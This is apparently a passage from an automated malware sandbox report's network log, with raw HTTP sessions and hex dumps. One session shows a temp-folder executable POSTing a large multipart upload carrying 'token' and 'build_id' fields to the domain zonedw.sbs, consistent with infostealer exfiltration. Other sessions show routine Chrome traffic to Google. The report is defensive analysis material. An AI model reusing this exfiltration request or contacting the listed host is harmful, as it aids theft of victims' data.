                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:55 UTC6186OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:57 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:56 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                15192.168.2.449884116.203.10.314437824C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----MO8YUKFUSJM7YMOPPPHV
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 393697
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 39 34 65 38 38 30 63 35 63 65 64 65 37 39 32 35 38 64 33 37 36 38 31 35 36 38 30 61 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 4f 38 59 55 4b 46 55 53 4a 4d 37 59 4d 4f 50 50 50 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------MO8YUKFUSJM7YMOPPPHVContent-Disposition: form-data; name="token"1994e880c5cede79258d376815680a06------MO8YUKFUSJM7YMOPPPHVContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------MO8YUKFUSJM7YMOPPPHVCont
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:58 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                16192.168.2.449892142.250.181.1324437292C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:58 GMT
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-CiNqIeTe-sNwhy9HdYV1Aw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC124INData Raw: 33 30 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6d 61 63 79 20 73 74 6f 72 65 73 20 63 6c 6f 73 69 6e 67 22 2c 22 68 65 6c 6c 64 69 76 65 72 73 20 32 20 69 6c 6c 75 6d 69 6e 61 74 65 22 2c 22 74 68 65 20 6a 61 63 6b 61 6c 20 66 69 6e 61 6c 65 20 72 65 63 61 70 22 2c 22 61 74 6c 61 6e 74 61 20 62 72 61 76 65 73 20 74 72 61 64 65 20 72 75 6d 6f 72 73 22 2c 22 67 6d 61 20
                                                                                                                                                                                                                                                Data Ascii: 30c)]}'["",["macy stores closing","helldivers 2 illuminate","the jackal finale recap","atlanta braves trade rumors","gma
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC663INData Raw: 64 65 61 6c 73 20 61 6e 64 20 73 74 65 61 6c 73 20 74 6f 72 79 20 6a 6f 68 6e 73 6f 6e 22 2c 22 63 72 69 74 69 63 73 20 63 68 6f 69 63 65 20 61 77 61 72 64 73 20 6e 6f 6d 69 6e 61 74 69 6f 6e 73 20 66 69 6c 6d 22 2c 22 62 6f 73 74 6f 6e 20 74 75 6e 6e 65 6c 20 66 6c 6f 6f 64 69 6e 67 22 2c 22 6e 66 6c 20 70 6c 61 79 6f 66 66 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67
                                                                                                                                                                                                                                                Data Ascii: deals and steals tory johnson","critics choice awards nominations film","boston tunnel flooding","nfl playoffs"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","g
                                                                                                                                                                                                                                                2024-12-13 12:52:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                17192.168.2.449894142.250.181.1324437292C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
